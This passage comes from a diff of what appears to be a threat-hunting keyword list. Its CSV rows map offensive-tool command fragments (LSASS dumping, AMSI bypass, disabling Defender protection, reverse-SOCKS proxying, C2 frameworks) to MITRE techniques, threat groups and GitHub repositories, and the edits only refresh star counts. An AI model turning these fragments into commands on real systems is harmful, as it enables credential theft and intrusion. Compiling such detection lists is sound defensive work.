T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -1693,107 +1693,107 @@ "* --script=http-ntlm-info --script-args=http-ntlm-info.root=*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "* --script=ldap-search -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --script=realvnc-auth-bypass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* --script-args dns-srv-enum.domain=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -ScriptString * -GetMinimallyObfuscated*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -ScriptString * -PSAmsiScanner *","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --seclogon-duplicate*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* --server * --type pass-pols*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* server -p 80 --reverse --socks5*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* server.py -s tornado --cert /*pem --key /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* -ServerUri * -FindAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* service -dump all-services.json*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* --service fortynorth*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --set-as-owned smart -bp * kerberos * --kdc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* Set-MpPreference -DisableIOAVProtection *","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* SetMzLogonPwd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* set-objectowner * -target-sid * -owner-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "* -sgn -syscalls *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* 
-sgn -unhook -antidebug *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "* SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - 
T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" -"* -SharPersist 
*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharPersist *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"* -SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* SharpSocks *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 
lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* 
-SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* SharpSocks *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --shell tcsh 